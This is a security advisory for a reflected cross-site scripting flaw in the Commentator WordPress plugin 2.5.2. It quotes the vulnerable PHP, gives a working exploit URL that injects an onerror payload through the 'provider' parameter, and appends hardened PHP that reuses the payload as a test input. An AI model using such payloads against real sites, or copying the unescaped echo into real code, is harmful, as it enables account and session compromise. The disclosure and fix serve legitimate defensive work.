WordPress Commentator 2.5.2 Cross Site Scripting

2016.01.14
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

#Product : Commentator WordPress Plugin
#Exploit Author : Rahul Pratap Singh
#Version : 2.5.2
#Home page Link : http://codecanyon.net/item/commentator-wordpress-plugin/6425752
#Website : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Date : 13/Jan/2016

XSS Vulnerability:

----------------------------------------
Description:
----------------------------------------
"provider" parameter is not sanitized that leads to Reflected XSS.

----------------------------------------
Vulnerable Code:
----------------------------------------
file: commentator.php

line:441
$provider_name = $_REQUEST["provider"];

line:544
<div id="commentator-social-signin" class="commentator-<?php echo $provider_name; ?>">

----------------------------------------
Exploit:
----------------------------------------
/wp-admin/admin-ajax.php?action=commentator_social_signin&provider=facebook">%20<IMG%20SRC=axc%20onerror=alert(1)>

----------------------------------------
POC:
----------------------------------------
https://0x62626262.files.wordpress.com/2016/01/commentatorxsspoc.png

Fix:
Update to 2.5.3

Disclosure Timeline:
reported to vendor : 9/1/2016
vendor response : 11/1/2016
vendor acknowledged : 11/1/2016
vendor deployed a patch: 11/1/2016

Pub ref:
http://codecanyon.net/item/commentator-wordpress-plugin/6425752
https://0x62626262.wordpress.com/2016/01/13/commentator-wordpress-plugin-xss-vulnerability
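
Added example (not part of the original advisory and not the vendor's 2.5.3 patch, which the advisory does not show): the echo at line 544 rewritten with an allowlist and attribute-context output encoding, in plain PHP so it runs outside WordPress. The allowlist contents, the 'unknown' fallback and the function names are assumptions made for illustration.

```php
<?php
// Assumed allowlist: the advisory only shows "facebook" as a provider value.
const ALLOWED_PROVIDERS = ['facebook'];

/** Attribute-context encoding: quotes and angle brackets become entities. */
function encode_attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Return the provider if it is allowlisted, otherwise null. */
function normalize_provider($raw): ?string
{
    if (!is_string($raw)) {            // provider[]=x arrives as an array
        return null;
    }
    $candidate = strtolower(trim($raw));
    return in_array($candidate, ALLOWED_PROVIDERS, true) ? $candidate : null;
}

/** Hardened form of the <div> emitted at line 544 of commentator.php. */
function render_signin_div($raw): string
{
    // Hypothetical fallback class for anything outside the allowlist.
    $provider = normalize_provider($raw) ?? 'unknown';
    // Encode even after allowlisting so the sink stays safe if the list grows.
    return '<div id="commentator-social-signin" class="'
        . encode_attr('commentator-' . $provider) . '">';
}

// Constructed inputs: a legitimate value and the URL-decoded request value
// from the advisory's Exploit section.
$samples = [
    'facebook',
    'facebook"> <IMG SRC=axc onerror=alert(1)>',
];

foreach ($samples as $value) {
    // Hardened output: the class attribute never contains request data verbatim.
    echo render_signin_div($value), PHP_EOL;
    // Encoding alone: the quote and angle brackets no longer close the attribute.
    echo '  encoded only: ', encode_attr($value), PHP_EOL;
}
```

Inside a WordPress plugin, esc_attr() is the usual call for the attribute-encoding step.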

References:

http://codecanyon.net/item/commentator-wordpress-plugin/6425752
https://0x62626262.wordpress.com/2016/01/13/commentator-wordpress-plugin-xss-vulnerability

